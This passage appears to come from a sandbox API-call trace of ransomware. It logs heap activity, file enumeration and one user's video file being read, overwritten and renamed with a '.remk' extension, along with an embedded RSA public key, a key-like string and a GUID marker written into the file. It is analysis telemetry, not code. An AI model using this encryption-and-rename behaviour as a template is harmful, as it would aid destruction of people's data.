[0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.010] GetCurrentThreadId () returned 0x314 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0237.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9f0 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc990 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0237.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf180 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.018] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xbaf4, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xbaf4, lpOverlapped=0x0) returned 1 [0237.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.018] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbaf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.018] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.019] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.019] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.019] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.019] CloseHandle (hObject=0x640) returned 1 [0237.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0237.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0237.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0237.022] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\nXQHuyqoJra2B.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\nxqhuyqojra2b.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\nXQHuyqoJra2B.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\nxqhuyqojra2b.avi.remk")) returned 1 [0237.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.023] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.025] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0948530, ftCreationTime.dwHighDateTime=0x1d5da79, ftLastAccessTime.dwLowDateTime=0x7ed331d0, ftLastAccessTime.dwHighDateTime=0x1d5e1e8, ftLastWriteTime.dwLowDateTime=0x7ed331d0, ftLastWriteTime.dwHighDateTime=0x1d5e1e8, nFileSizeHigh=0x0, nFileSizeLow=0xacce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sSO7KsP.avi", cAlternateFileName="")) returned 1 [0237.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0237.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0237.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6768 | out: hHeap=0x630000) returned 1 [0237.025] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\sSO7KsP.avi") returned=".avi" [0237.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\sSO7KsP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\_2khhez4uf5phry\\sso7ksp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.026] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=44238) returned 1 [0237.026] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.029] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xaca8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.029] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.031] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.031] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xacce, lpOverlapped=0x0) returned 1 [0237.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.032] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0237.033] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.033] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.033] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.033] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.033] GetLastError () returned 0x0 [0237.034] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.034] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0237.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.034] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.034] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.034] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xacd0) returned 0x37cf820 [0237.034] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf180 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf1c8 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0237.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.035] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc990 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc978 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: 